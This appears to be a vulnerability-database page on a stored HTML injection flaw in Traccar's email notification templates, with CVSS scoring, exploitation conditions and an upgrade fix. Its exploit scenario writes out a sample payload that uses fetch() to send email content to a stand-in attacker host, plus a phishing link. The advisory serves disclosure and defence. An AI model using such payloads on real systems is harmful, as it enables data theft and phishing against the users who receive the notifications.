EUVD-2026-27309Severity by source
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the email notification templates insert user-controlled device, geofence, and driver names into HTML email output without proper escaping. An attacker with low privileges can store crafted HTML in these fields, which is then rendered in notification emails sent to other users with access to the affected devices. This can lead to phishing or spoofed email content. This issue is fixed in version 6.13.0.
AnalysisAI
Stored cross-site scripting (XSS) in Traccar 6.11.1 through 6.12.x allows low-privilege authenticated users to inject malicious HTML into device, geofence, and driver name fields, which is then rendered unescaped in email notification templates sent to other users. This enables phishing attacks or spoofed email content delivered via the application's notification system. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires: (1) a valid Traccar user account with low-privilege permissions sufficient to create or modify device, geofence, or driver name fields; (2) access to the Traccar web interface or API endpoints that update these object properties; (3) at least one other user with permission to view notifications for the modified objects (typically higher-privilege administrators or team members); and (4) a notification trigger event (geofence entry/exit, alert condition, etc.) that causes an email to be sent to the target user. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | CVSS 5.4 (Medium) reflects the moderate severity: network-accessible (AV:N), low attack complexity (AC:L), requires low privileges (PR:L), and requires user interaction (UI:R-the recipient must open the HTML email). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A low-privilege user with access to create or edit devices in a Traccar fleet management system injects HTML payload into a device name field, such as '<img src=x onerror="fetch('http://attacker.com?admin_email='+document.body.innerText)">', or a phishing-like payload such as '<a href="http://phishing.com">Click here to re-authenticate</a>'. When the device triggers a geofence exit or entry notification, Traccar generates an email to fleet administrators containing this unescaped HTML. … |
| Remediation | Upgrade Traccar to version 6.13.0 or later immediately, as this version includes fixes for HTML escaping in email notification templates. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today